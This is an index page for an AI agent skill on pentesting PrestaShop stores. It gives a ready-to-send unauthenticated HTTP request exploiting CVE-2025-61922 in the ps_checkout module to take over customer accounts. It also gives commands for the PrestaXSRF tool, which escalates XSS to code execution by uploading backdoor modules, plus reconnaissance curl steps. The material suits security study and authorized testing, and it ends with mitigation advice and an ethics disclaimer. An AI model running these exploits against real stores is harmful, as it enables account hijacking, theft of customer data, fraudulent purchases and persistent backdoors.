OpenSkillIndex← back to search

Hacktricks-skills prestashop-pentest

How to exploit PrestaShop vulnerabilities including XSS-to-RCE escalation and account takeover attacks. Use this skill whenever the user mentions PrestaShop, e-commerce security testing, PrestaXSRF, CVE-2025-61922, ps_checkout module vulnerabilities, or needs to test PrestaShop installations for security issues. This skill covers exploitation techniques for PrestaShop 8.X.X and 1.7.X.X versions.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/prestashop/SKILL.MD
source content

PrestaShop Pentesting

A skill for testing PrestaShop e-commerce installations for security vulnerabilities, including XSS-to-RCE escalation and account takeover attacks.

When to Use This Skill

Use this skill when:

  • Testing a PrestaShop installation for vulnerabilities
  • You have found XSS in a PrestaShop site and want to escalate to RCE
  • Testing the 
    ps_checkout
    module for CVE-2025-61922
  • Analyzing PrestaShop 8.X.X or 1.7.X.X versions
  • You need to understand PrestaShop exploitation techniques

Vulnerability Coverage

1. XSS to RCE Escalation (PrestaXSRF)

The PrestaXSRF tool allows escalation from XSS to RCE or other critical vulnerabilities in PrestaShop.

Supported Versions:

  • PrestaShop 8.X.X
  • PrestaShop 1.7.X.X

Capabilities:

  • Upload custom modules (persistent backdoors)
  • RCE via 
    PSUploadModule()
    function
  • Other critical vulnerability exploitation

Tool: PrestaXSRF

Usage:

# Clone the tool
git clone https://github.com/nowak0x01/PrestaXSRF
cd PrestaXSRF

# Run against target
python3 prestaxsrf.py -u <target_url> -x <xss_payload>

Research: PrestaXSRF Technical Analysis

2. CVE-2025-61922: ps_checkout Account Takeover

Vulnerability: Missing identity validation in 

ps_checkout
module versions < 5.0.5 allows unauthenticated attackers to switch sessions to any customer by supplying their email address.

Affected Component: 

ps_checkout
module < 5.0.5

Attack Vector:

  • Endpoint: 
    POST /module/ps_checkout/ExpressCheckout
  • Authentication: None required (unauthenticated)
  • Impact: Account takeover, PII access, purchases with saved payment methods

Technical Details:

The vulnerability exists because:

  1. ExpressCheckout.php
    accepts attacker-controlled JSON and only validates 
    orderID
  2. It builds 
    ExpressCheckoutRequest
    and calls 
    ExpressCheckoutAction::execute()
  3. In vulnerable versions, when no user is logged in, 
    CustomerAuthenticationAction::execute()
    is called
  4. This method only checks 
    customerExists(<payer_email>)
    and then does 
    context->updateCustomer(new Customer($id))
  5. Result: Email existence == login (no password or token verification)
  6. The attacker controls 
    order.payer.email_address
    in the JSON payload

Exploitation Steps:

  1. Reconnaissance: Collect any registered customer email address (admin accounts are separate and not affected)

  2. Exploitation: Send an unauthenticated POST request to the controller with 

    orderID
    and the victim email in 
    order.payer.email_address

  3. Session Hijack: Even if the endpoint returns HTTP 500, the response will include cookies for the victim's customer context (session already switched)

  4. Post-Exploitation: Access PII, view order history, or make purchases with saved payment methods

Exploit Request:

POST /module/ps_checkout/ExpressCheckout HTTP/1.1
Host: <target>
Content-Type: application/json
Content-Length: 72

{"orderID":"1","order":{"payer":{"email_address":"victim@example.com"}}}

Detection:

Check if the 

ps_checkout
module is installed and its version:

# Check module version in source code
curl -s https://<target>/module/ps_checkout/ | grep -i "version"

# Or check via API if available
curl -s https://<target>/api/modules/ps_checkout

Mitigation:

  • Update 
    ps_checkout
    module to version 5.0.5 or later
  • Implement proper identity validation in ExpressCheckout flow
  • Add CSRF tokens to sensitive endpoints
  • Validate session state before allowing account actions

Testing Workflow

Step 1: Identify PrestaShop Version

# Check version from source
curl -s https://<target> | grep -i "prestashop"

# Check via robots.txt
curl -s https://<target>/robots.txt

# Check via sitemap
curl -s https://<target>/sitemap.xml

Step 2: Check for ps_checkout Module

# Check if module exists
curl -s https://<target>/module/ps_checkout/

# Check module version
curl -s https://<target>/module/ps_checkout/ExpressCheckout.php | head -20

Step 3: Test for CVE-2025-61922

Use the provided script 

test_ps_checkout.py
to test for the vulnerability:

python3 scripts/test_ps_checkout.py --target https://<target> --email victim@example.com

Step 4: If XSS Found, Escalate with PrestaXSRF

If you've identified XSS vulnerabilities:

# Use PrestaXSRF to escalate
python3 scripts/run_prestaxsrf.py --target https://<target> --xss-payload "<script>alert(1)</script>"

Safety and Ethics

  • Only test systems you have explicit authorization to test
  • Document all findings for remediation
  • Report vulnerabilities responsibly to site owners
  • Do not use these techniques for unauthorized access

References